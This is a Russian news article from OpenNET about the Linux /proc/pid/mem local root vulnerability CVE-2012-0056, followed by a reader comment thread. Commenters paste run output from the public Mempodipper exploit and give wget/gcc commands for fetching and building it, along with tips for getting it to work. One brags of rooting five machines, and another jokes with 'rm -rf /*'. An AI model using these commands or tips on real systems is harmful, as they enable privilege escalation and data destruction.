The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги | ]

23.01.2012 15:48  В ядре Linux найдена локальная root-уязвимость

В ядре Linux найдена опасная уязвимость, позволяющая локальному злоумышленнику выполнить код с правами пользователя root (при наличии доступной пользователю SUID root программы, такой как, например, /bin/su). Проблема наблюдается, начиная с ядра 2.6.39. Уязвимость также проявляется для ядра, используемого в RHEL 6 (начиная с 2.6.32-220.el6, но старее 2.6.32-220.4.1, в котором уязвимость исправлена). На данный момент уже опубликовано три рабочих эксплоита. Уязвимости присвоен номер CVE-2012-0056.

Источником уязвимости является ошибка в реализации proc-интерфейса для прямого доступа к памяти процесса (/proc/pid/mem). До версии ядра 2.6.39 этот интерфейс предоставлял доступ только на чтение, т.к. было известно, что для записи он небезопасен. Незадолго до выхода версии 2.6.39 ограничения доступа к /proc/pid/mem были переделаны, после чего доступ на запись был разрешён. Как оказалось, проверка привилегий была выполнена некорректно, что позволяет локальному пользователю получить права суперпользователя во всех ядрах 2.6.39 и выше (исключая GIT snapshot, в котором данная уязвимость была на днях закрыта), а также в ядрах из состава RHEL 6.

Уязвимость обнаружил Juri Aedla, который в приватном порядке уведомил разработчиков ядра Linux. К сожалению, изменения в Git-репозитории ядра были внесены спешно, что позволило создать эксплоиты на основе анализа изменений ещё до появления обновлений с исправлением проблемы в дистрибутивах. На момент публикации этой новости уязвимость была исправлена в дистрибутивах ALT Linux. По неофициальной информации, обновления для Red Hat и Ubuntu планировалось выпустить завтра, но в ситуации появления эксплоита в публичном доступе, процесс выпуска обновлений будет форсирован и, возможно, они выйдут уже сегодня.

Временно нейтрализовать проблему можно запретив доступ пользователей ко всем SUID/SGID программам, либо с помощью systemtap (на дистрибутивах от Red Hat и на Debian и Ubuntu). В число уязвимых попадают некоторые продукты на базе RHEL 6 и относительно недавно выпущенные дистрибутивы, поставляемые с ядрами 2.6.39, 3.0, 3.1 и 3.2 - Fedora 16, Ubuntu 11.10, OpenSUSE 12.1, Arch Linux, Gentoo и т.п. Статус выпуска обновлений для различных дистрибутивов можно проследить на данных страницах: Ubuntu, Gentoo, openSUSE, Fedora, Debian, Red Hat Enterprise Linux 6, Scientific Linux 6 и Cent OS 6.

Дополнение 1: Выявленная проблема по своему проявляется и для более старых ядер Linux до версии 2.6.39, для которых потенциально возможно проведение менее опасных атак, связанных с чтением областей памяти процессов (например, возможно чтение остающихся в памяти определённого процесса криптографических ключей, хэшей паролей и других приватных данных).

Дополнение 2: Упомянутый выше Git-коммит привносит другую, сравнительно небольшую, проблему (возможный обход ограничения расхода памяти пользователем).

Дополнение 3: Вышло обновление с устранением уязвимости для Ubuntu 11.10.

Дополнение 4: Вышел эксплоит для платформы Android.

Дополнение 5: Вышло обновление для RHEL 6.

Дополнение 6: На RHEL 6 и некоторых других системах, где опубликованные эксплойты как-бы не работают, дело в ASLR и PIE. Для успешной атаки потребуется другая SUID/SGID-программа (собранная не как PIE, но тоже выводящая что-то подходящее в stdout или stderr) или обход ASLR (много запусков) или выключенный ASLR (для проверки). Поэтому, для пользователей подобных систем также важно установить обновление для ядра Linux.

Дополнение 7: Kees Cook (Chrome OS, Ubuntu) предлагает добавить в ядро новый sysctl kernel.proc_pid_mem, который позволит отключать поддержку /proc/pid/mem полностью или ограничивать ее режимом только на чтение. На данный момент (24 января), в LKML опубликована уже третья редакция соответствующего патча, с учетом замечаний от других разработчиков.

Дополнение 8: Данная уязвимость исправлена в ядрах 3.0.18 и 3.2.2 c использованием ранее указанного коммита.

  1. Главная ссылка к новости (http://blog.zx2c4.com/749...)
  2. OpenNews: Релиз Linux-ядра 2.6.39
Автор новости: Artem S. Tashkinov
Тип: Интересно / Проблемы безопасности
Ключевые слова: linux, security, exploit, proc
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Ajax/Линейный | Раскрыть все сообщения | RSS
 
  • 1.1, birdie (?), 16:00, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]
  • +3 +/
    Работает - запускал в виртуалке (фиг знает что там за shell code):

    Ядро 3.2.1:

    $ ./a.out
    ===============================
    =          Mempodipper        =
    =           by zx2c4          =
    =         Jan 21, 2012        =
    ===============================

    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/2684/mem in child.
    [+] Sending fd 3 to parent.
    [+] Received fd at 5.
    [+] Assigning fd 5 to stderr.
    [+] Reading su for exit@plt.
    [+] Resolved exit@plt to 0x8049a44.
    [+] Calculating su padding.
    [+] Seeking to offset 0x8049a38.
    [+] Executing su with shellcode.
    # whoami
    root

     
     
  • 2.181, Аноним (-), 23:44, 24/01/2012 [^] [ответить]     [к модератору]
  • +/
    А оно там со _всеми_ исходниками, и прога, и шеллкод См http git zx2c4 com C... весь текст скрыт [показать]
     
  • 1.3, ВКПб (?), 16:48, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    C grsecurity не сработал эксплойт.
     
     
  • 2.20, deadless (ok), 17:22, 23/01/2012 [^] [ответить]    [к модератору]  
  • –1 +/
    а с SELinux ?
     
     
  • 3.41, ВКПб (?), 18:00, 23/01/2012 [^] [ответить]    [к модератору]  
  • +2 +/
    Зависит от обрезанности /proc.
     
  • 1.4, Аноним (-), 16:48, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +25 +/
    Ого, какая продинутая и нетривиальная атака. Целый детектив по обходу затычек и проверок, с epic win-ом в конце. Обнаруживший это - реальный молоток, с мышлением истинного хакера. Там где программист думает "как сделать чтобы работало", хакер думает "а как бы мне сделать чтобы оно нае...лось?!"
     
  • 1.5, abra (ok), 16:49, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • –4 +/
    Linux localhost 3.2.0-10-generic #17-Ubuntu SMP Thu Jan 19 19:04:20 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux

    тоже работает

     
     
  • 2.217, XoRe (ok), 18:52, 25/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > Linux localhost 3.2.0-10-generic #17-Ubuntu SMP Thu Jan 19 19:04:20 UTC 2012 x86_64
    > x86_64 x86_64 GNU/Linux
    > тоже работает

    мы атакуем ваш localhost )

     
  • 1.6, Микро (?), 16:56, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +10 +/
    Порутал 5 машин уже, спасибо.
     
     
  • 2.49, Клыкастый2 (?), 18:27, 23/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > Порутал 5 машин уже, спасибо.

    :)))) ай какой нехорооооший....

     
  • 1.8, Дмитрий (??), 17:01, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • –12 +/
    2.6.32-5-686-bigmem SMP i686 Debian Squeeze

    user@usercomp:/tmp/1$ ./a.out
    ...
    [+] Seeking to offset 0x8049a29.
    [+] Executing su with shellcode.
    user@usercomp:/tmp/1$

    ЧЯДНТ?

     
     
  • 2.10, Аноним (-), 17:02, 23/01/2012 [^] [ответить]    [к модератору]  
  • +3 +/
    Написано же - с ядер. 2.6.39
     
  • 2.11, Аноним (-), 17:02, 23/01/2012 [^] [ответить]    [к модератору]  
  • +7 +/
    > ЧЯДНТ?

    Новость не читаешь. Там русским по болотному написано: работает для ядер .39 и новее.

     
  • 2.12, arachnid (ok), 17:03, 23/01/2012 [^] [ответить]    [к модератору]  
  • +/
    номер ядер сравни :)
     
  • 2.13, Аноним (-), 17:04, 23/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > 2.6.32-5-686-bigmem SMP i686 Debian Squeeze
    > ЧЯДНТ?

    Перечитайте о каких версиях ядра идёт речь.


     
  • 2.14, anthonio (ok), 17:09, 23/01/2012 [^] [ответить]    [к модератору]  
  • +2 +/
    читаешь хреново...
    >= 2.6.39
     
  • 2.15, CrOrc (?), 17:09, 23/01/2012 [^] [ответить]    [к модератору]  
  • +1 +/
    Сказано: начиная с 2.6.39.
    В Debian 2.6.39 только в testing и backports.
     
  • 2.18, Lain_13 (?), 17:20, 23/01/2012 [^] [ответить]    [к модератору]  
  • +19 +/
    Мне так показалось, что выше не совсем ясно сказали, что дело в версии ядра, а потому я тоже обращу на это внимание.
     
  • 2.75, ASM (??), 19:33, 23/01/2012 [^] [ответить]    [к модератору]  
  • +1 +/
    обратите внимание на версию ядра
     
  • 2.84, phaoost (ok), 20:41, 23/01/2012 [^] [ответить]    [к модератору]  
  • +3 +/
    да-да, обратите внимание на версию ядра
     
     
  • 3.167, Аноним (-), 16:49, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > да-да, обратите внимание на версию ядра

    Думаю, нужно всё-таки ядро поновее, .39 там или выше. Обратите внимание на версию ядра.

     
  • 2.116, Аноним (-), 00:25, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    Скорее всего, дело в версии вашего ядра.
     
  • 2.119, Аноним (-), 05:30, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    Для тугодумов: человек акцентировал внимание на том, что не нужно гнаться за версиями. Нужно сидеть на стабильненьком дебиане, без уязвимостей.
     
     
  • 3.234, taz (?), 16:29, 01/02/2012 [^] [ответить]    [к модератору]  
  • +/
    ой лол, а сквиз уже не стабилен вдруг? ;)
     
  • 2.218, XoRe (ok), 18:55, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    Думаете, в версиях с 2 6 32 по 2 6 39 только цыфырку меняли В 2 67 32 вполне мо... весь текст скрыт [показать]
     
     
  • 3.221, RusAlex (?), 23:38, 25/01/2012 [^] [ответить]    [к модератору]  
  • +/
    дело в том, что в версии .39 была убрана дополнительная проверка, вледствие чего уязвимость и стала возможной.
     
  • 3.225, Andrey Mitrofanov (?), 10:37, 26/01/2012 [^] [ответить]     [к модератору]  
  • +1 +/
    Вам привет от Грега КХ и 2 6 32 55 Про дистрибутивы не слышали Про обновления ... весь текст скрыт [показать]
     
  • 1.16, ALex_hha (ok), 17:14, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    А RHEL то зачем приплели, там 2.6.32
     
     
  • 2.24, solardiz (ok), 17:28, 23/01/2012 [^] [ответить]     [к модератору]  
  • +2 +/
    Там не 2 6 32, а своя ветка, уже давно ушедшая от 2 6 32 на приличное расстояние... весь текст скрыт [показать]
     
  • 1.19, solardiz (ok), 17:20, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +6 +/
    Проблеме также подвержены свежие ядра из RHEL 6 (новость исправил). Вот анализ от Red Hat:

    https://access.redhat.com/kb/docs/DOC-69129
    https://bugzilla.redhat.com/show_bug.cgi?id=782642

    Там же - workaround с использованием SystemTap. Другой workaround - убрать пользователям доступ ко всем SUID/SGID программам.

    К сожалению, исправление в git от 17-го января привносит другую проблему, сравнительно небольшую (обход RLIMIT_NPROC * RLIMIT_AS):

    http://www.openwall.com/lists/oss-security/2012/01/22/5

    Дискуссия на /r/netsec:

    http://www.reddit.com/r/netsec/comments/os8wl/linux_local_privilege_escalatio

    Более старые ядра именно этой атаке не подвержены, но могут быть подвержены схожим атакам через чтение (а не запись) того же /proc/<pid>/mem. Конкретных атак (attack vectors) пока нет (пока не нашли такой программы и такого способа атаки, чтобы это было проблемой безопасности); в теории, это может быть утечка криптографических ключей, хешей паролей и т.п. Исправление этого обсуждается. В любом случае, это будет другой номер CVE.

     
     
  • 2.156, Аноним (-), 14:13, 24/01/2012 [^] [ответить]    [к модератору]  
  • +2 +/
    Читать ваши комментарии на опеннете, пожалуй, интереснее всех остальных.
     
  • 1.22, Аноним (-), 17:25, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • –1 +/
    > На данный момент ни один из дистрибутивов данную ошибку не закрыл.

    Debian stable не повержен насколько я понял.

     
     
  • 2.42, Michael Shigorin (ok), 18:10, 23/01/2012 [^] [ответить]     [к модератору]  
  • +2 +/
    Неправда Он и не был подвержен с 2 6 32, очевидно А в альте исправили три дня... весь текст скрыт [показать]
     
     
  • 3.169, vle (ok), 17:18, 24/01/2012 [^] [ответить]     [к модератору]  
  • +/
    По поводу ASLR PIE в качестве защиты В ядре 2 6 26 proc maps выставлен флаг ... весь текст скрыт [показать]
     
  • 1.23, Андрей (??), 17:27, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    uname -a
    Linux big.home.local 3.2.1-gentoo #1 SMP Sat Jan 14 19:21:48 MSK 2012 x86_64 AMD Athlon(tm) II X2 215 Processor AuthenticAMD GNU/Linux

    не работает :S

    ./a.out
    ===============================
    =          Mempodipper        =
    =           by zx2c4          =
    =         Jan 21, 2012        =
    ===============================

    [+] Opening socketpair.
    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/9108/mem in child.
    [+] Sending fd 5 to parent.
    [+] Received fd at 5.
    [+] Assigning fd 5 to stderr.
    [+] Reading su for exit@plt.
    [-] Could not resolve /bin/su. Specify the exit@plt function address manually.
    [-] Usage: ./a.out -o ADDRESS
    [-] Example: ./a.out -o 0x402178

     
     
  • 2.120, anonymous (??), 05:56, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    скопируй в /bin/su любой суидный исполняемый файл, заработает.
     
     
  • 3.121, arisu (ok), 05:59, 24/01/2012 [^] [ответить]    [к модератору]  
  • +6 +/
    > скопируй в /bin/su любой суидный исполняемый файл, заработает.

    а может, сразу уже пароль рута вести и не мучаться?

     
     
  • 4.184, Аноним (-), 00:01, 25/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > а может, сразу уже пароль рута вести и не мучаться?

    Угадать адрес в su как-то зело проще чем пароль от рута.

     
  • 1.25, bircoph (ok), 17:28, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Разные машины с Gentoo, ядра 2.6.39.3, 3.0.8, 3.1.6.
    Ни один из эксплойтов не работает 8-P
     
     
  • 2.28, Кровавый (?), 17:35, 23/01/2012 [^] [ответить]    [к модератору]  
  • +9 +/
    Ну это же Gentoo. Надо было курить маны, потом пересобирать! ;)
     
  • 2.29, sig_wall (?), 17:35, 23/01/2012 [^] [ответить]    [к модератору]  
  • +5 +/
    в генте /bin/su нечитаем для обычного юзера - надо указывать оффсет вручную. в моей генте подошло -o 0x402100
     
     
  • 3.46, Michael Shigorin (ok), 18:18, 23/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > в генте /bin/su нечитаем для обычного юзера - надо указывать оффсет вручную.

    В ALT -- обычно тоже, доступных всем suid binaries негусто.

     
     
  • 4.88, Аноним (-), 21:34, 23/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > В ALT -- обычно тоже, доступных всем suid binaries негусто.

    А зачем нужен su недоступный пользователю? :))

     
     
  • 5.96, Michael Shigorin (ok), 22:10, 23/01/2012 [^] [ответить]     [к модератору]  
  • +/
    1 для понижения привилегий рутом 2 если недоступен всем, то это ещё не значит... весь текст скрыт [показать]
     
     
  • 6.178, Аноним (-), 23:23, 24/01/2012 [^] [ответить]     [к модератору]  
  • +/
    А я почему-то всегда думал что su в основном нужен чтобы разрешить сильно некото... весь текст скрыт [показать]
     
     
  • 7.183, Michael Shigorin (ok), 23:55, 24/01/2012 [^] [ответить]     [к модератору]  
  • +/
    http www opennet ru openforum vsluhforumID3 73378 html 19 Необязательно эти пр... весь текст скрыт [показать]
     
     
  • 8.186, Аноним (-), 00:12, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    Упс Я тормоз и почему-то подумал в этот момент о sudo, на основании чего меня ... весь текст скрыт [показать]
     
  • 5.114, arisu (ok), 00:00, 24/01/2012 [^] [ответить]    [к модератору]  
  • +2 +/
    > А зачем нужен su недоступный пользователю? :))

    доступность для запуска != доступность для чтения. ваш Кэп.

     
     
  • 6.152, Аноним (-), 13:32, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    зачем читать su?
     
  • 6.179, Аноним (-), 23:29, 24/01/2012 [^] [ответить]     [к модератору]  
  • +/
    А, я думал пользователя просто совсем обули на какую либо деятельность с su А в... весь текст скрыт [показать]
     
     
  • 7.180, arisu (ok), 23:35, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > А в чем профит запрета чтения файла su при доступности его выполнения?

    а зачем обычному юзеру его читать? мало ли, какая там информация, всё-таки suid.

     
     
  • 8.187, Аноним (-), 00:17, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    Собственно, обычный пользователь может его из пакета качнуть, так что если там к... весь текст скрыт [показать]
     
     
  • 9.189, arisu (ok), 00:23, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    орли не путаем админа локалхоста и 171 обычного юзера 187 да, я в курсе, ч... весь текст скрыт [показать]
     
  • 7.182, Аноним (-), 23:48, 24/01/2012 [^] [ответить]     [к модератору]  
  • +/
    Сколько вон дырок находили в glibc Не удивлюсь, если завтра опять через дыру в ... весь текст скрыт [показать]
     
  • 3.77, Андрей (??), 19:57, 23/01/2012 [^] [ответить]    [к модератору]  
  • +/
    ну это, наверное, PIC "виноват"?:)
     
     
  • 4.170, vle (ok), 17:21, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > ну это, наверное, PIC "виноват"?:)

    ls -la /proc/1/maps; uname -srm
    что говорят?

     
  • 3.151, arsenicum (??), 12:57, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    Сырцы обновили, теперь в указании смещения нет необходимости. 3.1.6-gentoo — работает.
     
     
  • 4.157, arisu (ok), 14:22, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    что-то не вижу обновлений.
     
     
  • 5.166, arsenicum (??), 16:38, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    http://git.zx2c4.com/CVE-2012-0056/
     
     
  • 6.176, arisu (ok), 21:33, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > http://git.zx2c4.com/CVE-2012-0056/

    хм. таки да.

     
  • 2.145, Аркола (?), 11:29, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    Ну ты не так собрал :)
     
     ....нить скрыта, показать (22)

  • 1.26, savant (ok), 17:31, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    А для ARM будет работать?
     
     
  • 2.36, EuPhobos (ok), 17:53, 23/01/2012 [^] [ответить]    [к модератору]  
  • +1 +/
    Будет, но эксплоит нужен соответсвующий..
     
  • 2.190, Аноним (-), 01:00, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    По дефолту не будет Там в нескольких местах есть else error That platform i... весь текст скрыт [показать]
     
  • 1.27, FiX лень логиниться (?), 17:34, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    Linux fix-laptop 3.2.1-1-ARCH #1 SMP PREEMPT Fri Jan 13 06:50:31 CET 2012 x86_64 Intel(R) Core(TM) i7-2617M CPU @ 1.50GHz GenuineIntel GNU/Linux

    Подозреваю, что уже пофиксено? Тогда в топике дезинформация - Arch не попадает в список.

     
     
  • 2.30, FiX лень логиниться (?), 17:36, 23/01/2012 [^] [ответить]    [к модератору]  
  • +1 +/
    Хм... пишут, что на 3.2.1 все же работает.
    Получается, что дырка до сих пор не исправлена даже в официальном ядре?
     
     
  • 3.39, solardiz (ok), 17:57, 23/01/2012 [^] [ответить]    [к модератору]  
  • +2 +/
    > Получается, что дырка до сих пор не исправлена даже в официальном ядре?

    Исправлена 17-го числа. 3.2.1 вышел раньше. 3.3-rc1 вышел 19-го и, думаю, уже содержит это исправление.

     
  • 2.32, Anonimous (?), 17:39, 23/01/2012 [^] [ответить]    [к модератору]  
  • +/
    Тоже ядро, тот же Arch. Не работает: segmentation fault ./mempodipper
     
     
  • 3.79, анон (?), 19:59, 23/01/2012 [^] [ответить]    [к модератору]  
  • –1 +/
    > Тоже ядро, тот же Arch. Не работает: segmentation fault ./mempodipper

    Как его вообще скомпилить %) ???

     
     
  • 4.111, emg81 (ok), 23:55, 23/01/2012 [^] [ответить]    [к модератору]  
  • +/
    $ wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
    $ gcc mempodipper.c
    $

    скомпилен файл a.out. разве это сложно? :)

     
  • 2.112, дон педро (?), 23:58, 23/01/2012 [^] [ответить]    [к модератору]  
  • +/
    подтверждаю. в арче не работает.
     
  • 1.33, Аноним (-), 17:41, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    В https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0056 написано:
    > Candidate assigned on 20111207

    Это страшно.

     
     
  • 2.37, solardiz (ok), 17:54, 23/01/2012 [^] [ответить]     [к модератору]  
  • +5 +/
    Вовсе не страшно CNA, включая Red Hat, получают пулы CVE-номеров заранее, еще н... весь текст скрыт [показать]
     
  • 1.43, Аноним (-), 18:12, 23/01/2012 [ответить] [показать ветку] [···]     [к модератору]  
  • +/
    Снова человеческий фактор легкомыслия Исправления таких вещей надо публиковать ... весь текст скрыт [показать]
     
     
  • 2.47, Клыкастый2 (?), 18:18, 23/01/2012 [^] [ответить]     [к модератору]  
  • +/
    это да, ато вдруг внезапно выяснится, что apt-get-kiddies не в состоянии патч на... весь текст скрыт [показать]
     
     
  • 3.91, Аноним (-), 21:38, 23/01/2012 [^] [ответить]     [к модератору]  
  • +/
    У аптгетчиков уже апдейт прилетел, приколись Оперативно работают, ядро прилетае... весь текст скрыт [показать]
     
     
  • 4.105, Аноним (-), 23:29, 23/01/2012 [^] [ответить]    [к модератору]  
  • –1 +/
    > У аптгетчиков уже апдейт прилетел, приколись? Оперативно работают, ядро прилетает одновременно
    > с новостью :)

    У других апгетчиков, нестабильных, апдейт пока прилетать не планирует.

     
     
  • 5.191, Аноним (-), 01:03, 25/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > У других апгетчиков, нестабильных, апдейт пока прилетать не планирует.

    В убунтах например прилетело очень быстро, буквально вместе с новостью.

     
  • 4.160, Аноним (-), 15:36, 24/01/2012 [^] [ответить]     [к модератору]  
  • –1 +/
    В комплекте с закрытием этой уязвимости - прилетело открытие новой В общем, нет... весь текст скрыт [показать]
     
     
  • 5.188, Michael Shigorin (ok), 00:23, 25/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > В комплекте с закрытием этой уязвимости - прилетело открытие новой.

    (глядя в почту) В упор не наблюдаю.

    > В общем, нет покоя аптгетчикам :)

    apt-get yaawn :)

     
  • 5.192, Аноним (-), 01:05, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    Что за новая уязвимость Пруф А остальные чем принципиально лучше хуже У них д... весь текст скрыт [показать]
     
     
  • 6.202, Аноним (-), 02:05, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    http www openwall com lists oss-security 2012 01 22 5 Нет, это у убунты персон... весь текст скрыт [показать]
     
     
  • 7.235, Аноним (-), 16:33, 07/02/2012 [^] [ответить]    [к модератору]  
  • +/
    > Нет, это у убунты персональные дырки. Потому что ее "разработчикам" лень проверять
    > патчи, которые они применяют.

    А остальные как обрулили проблему озвученную в рассылке?

     
  • 2.51, filosofem (ok), 18:28, 23/01/2012 [^] [ответить]    [к модератору]  
  • +1 +/
    >Неужели и в наш век в сети можно найти сервис где локальные учетки раздают?

    Не обязательно. На вэб-хостинг к примеру достаточно php-shell заалоадить.

     
     
  • 3.63, Аноним (-), 19:02, 23/01/2012 [^] [ответить]    [к модератору]  
  • +/
    Вариант вывалится из под контроля процесса под его привелегии я понимаю. Но спрашивал я именно про локальные учетки. Почему-то мне думается что уже повсюду контейнеры ..
     
     
  • 4.69, solardiz (ok), 19:13, 23/01/2012 [^] [ответить]     [к модератору]  
  • +1 +/
    Shared hosting действительно у многих перемещается в контейнеры, но внутри них п... весь текст скрыт [показать]
     
  • 4.72, Аноним (-), 19:19, 23/01/2012 [^] [ответить]     [к модератору]  
  • –2 +/
    Далеко не все используют контейнеры для затыкания рутовых зеро-дэй, которые ожид... весь текст скрыт [показать]
     
     
  • 5.82, Michael Shigorin (ok), 20:20, 23/01/2012 [^] [ответить]    [к модератору]  
  • –1 +/
    > Далеко не все

    ...и пусть их.

     
  • 5.161, Аноним (-), 15:38, 24/01/2012 [^] [ответить]     [к модератору]  
  • +2 +/
    Не знаю как у вас, а у нас в линуксе оверхед от контейнеров lxc практически ну... весь текст скрыт [показать]
     
  • 5.193, Аноним (-), 01:12, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    Нагрузка от LXC контейнеров практически по нулям ну может пару процентов отличи... весь текст скрыт [показать]
     
     
  • 6.203, коксюзер (?), 02:06, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    На данный момент разве что при условии монтирования proc в режиме ro И не с по... весь текст скрыт [показать]
     
  • 6.211, Аноним (-), 04:14, 25/01/2012 [^] [ответить]     [к модератору]  
  • +/
    О великий аноним, может ты дашь мне доступ к своему контейнеру на не обновленном... весь текст скрыт [показать]
     
  • 5.236, Аноним (-), 16:35, 07/02/2012 [^] [ответить]    [к модератору]  
  • +/
    > Далеко не все используют контейнеры для затыкания рутовых зеро-дэй

    Тогда пусть не обижаются потом крутым руткитам и тому факту что их ресурсы использовали нашару.

     
     ....нить скрыта, показать (19)

  • 1.45, Buy (??), 18:14, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +2 +/
    Ubuntu 11.10. Работает.
    .............

    [+] Calculating su padding.
    [+] Seeking to offset 0x4021cc.
    [+] Executing su with shellcode.
    #
    # id
    uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),46(plugdev),115(lpadmin),117(admin),122(sambashare)
    # rm -rf /*

    :)))

     
     
  • 2.54, anonymous (??), 18:41, 23/01/2012 [^] [ответить]    [к модератору]  
  • +/
    debian testing тоже работает
     
  • 2.106, Аноним (-), 23:33, 23/01/2012 [^] [ответить]    [к модератору]  
  • +/
    > # rm -rf /*
    > :)))

    --no-preserve-root забыли.

     
     
  • 3.159, Аноним (-), 15:34, 24/01/2012 [^] [ответить]    [к модератору]  
  • +/
    Со звездочкой - необязательно, preserve-root все равно не работает.
     
  • 1.50, ALex_hha (ok), 18:28, 23/01/2012 [ответить] [показать ветку] [···]     [к модератору]  
  • –5 +/
    wget http git zx2c4 com CVE-2012-0056 plain mempodipper c gcc -o mempodipp... весь текст скрыт [показать]
     
     
  • 2.62, XPEH (?), 18:58, 23/01/2012 [^] [ответить]    [к модератору]  
  • –3 +/
    > ЧЯДНТ?

    Читать не умеете: во всех ядрах 2.6.39 и выше

     
     
  • 3.71, solardiz (ok), 19:18, 23/01/2012 [^] [ответить]    [к модератору]  
  • +1 +/
    ... и в RHEL 6 начиная с 2.6.32-220.el6, согласно Red Hat'у. Так что CentOS 6 с этой версией ядра должен быть уязвим. Но там могут быть другие отличия, ломающие конкретный эксплойт.
     
  • 2.65, solardiz (ok), 19:05, 23/01/2012 [^] [ответить]     [к модератору]  
  • +1 +/
    Это немного странно, хотя не-работа конкретного эксплойта мало что значит Если ... весь текст скрыт [показать]
     
  • 2.165, solardiz (ok), 15:52, 24/01/2012 [^] [ответить]     [к модератору]  
  • +1 +/
    Как многие уже догадались, на RHEL 6 и некоторых других системах, где опубликова... весь текст скрыт [показать]
     
  • 1.55, ILYA INDIGO (ok), 18:43, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    ilya@ILYA:/tmp> uname -a
    Linux ILYA 3.2.1-3-desktop #1 SMP PREEMPT Fri Jan 13 10:38:45 UTC 2012 (2eca2bf) x86_64 x86_64 x86_64 GNU/Linux
    ilya@ILYA:/tmp> gcc ./a.c -o c
    ilya@ILYA:/tmp> ./c
    ===============================
    =          Mempodipper        =
    =           by zx2c4          =
    =         Jan 21, 2012        =
    ===============================

    [+] Opening socketpair.
    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/30336/mem in child.
    [+] Sending fd 5 to parent.
    [+] Received fd at 5.
    [+] Assigning fd 5 to stderr.
    [+] Reading su for exit@plt.
    [+] Resolved exit@plt to 0x25e0.
    [+] Calculating su padding.
    [+] Seeking to offset 0x25be.
    [+] Executing su with shellcode.
    ilya@ILYA:/tmp> whoami
    ilya

    Это я что то не так делаю, или в openSUSE этого бага нету?

     
     
  • 2.61, ILYA INDIGO (ok), 18:57, 23/01/2012 [^] [ответить]    [к модератору]  
  • +/
    Таки в openSUSE этот эксплоит НЕ пашет :)
    Конечно при постоянном обновлении, хотя последний раз обновлялся 21-ого.
     
     
  • 3.66, solardiz (ok), 19:06, 23/01/2012 [^] [ответить]    [к модератору]  
  • +1 +/
    > Таки в openSUSE этот эксплоит НЕ пашет :)

    ...что ничего не означает о наличии или отсутствии этой уязвимости. :-)

     
     
  • 4.80, ILYA INDIGO (ok), 20:04, 23/01/2012 [^] [ответить]    [к модератору]  
  • +/
    Я и не спорю, про уязвимость в целом, но констатирую отдельный факт.
     
  • 2.108, Sergey (??), 23:38, 23/01/2012 [^] [ответить]    [к модератору]  
  • +/
    Да, у меня тоже в OpenSuSe не пашет
     
  • 1.58, Аноним (-), 18:48, 23/01/2012 [ответить] [показать ветку] [···]     [к модератору]  
  • +1 +/
    Debian wheezy sid работает 3 2 0-1-amd64 1 SMP Thu Jan 19 09 46 46 UTC 2012 ... весь текст скрыт [показать]
     
  • 1.64, Аноним (-), 19:04, 23/01/2012 [ответить] [показать ветку] [···]    [к модератору]  
  • +/
    В Debian Squeeze обновленного из backports с ядром 2.6.39 норм запустился.
    А в OpenSuSE 12.1 с ядром 3.1 молча весь вывод пробегает, но su терминал не предоставляет... Печаль :-(
     
     
  • 2.67, Аноним (-), 19:08, 23/01/2012 [^] [ответить]    [к модератору]  
  • +/
    Вопрос походу отпал.
    Они 5 января уязвимость пофиксили вроде как. И хотя я еще не разу её не обновил, но скачал DVD и устанавливал около 15числа.
     
  • 1.68, Аноним (-), 19:11, 23/01/2012 [ответить] [показать ветку] [···]     [к модератору]  
  • +/
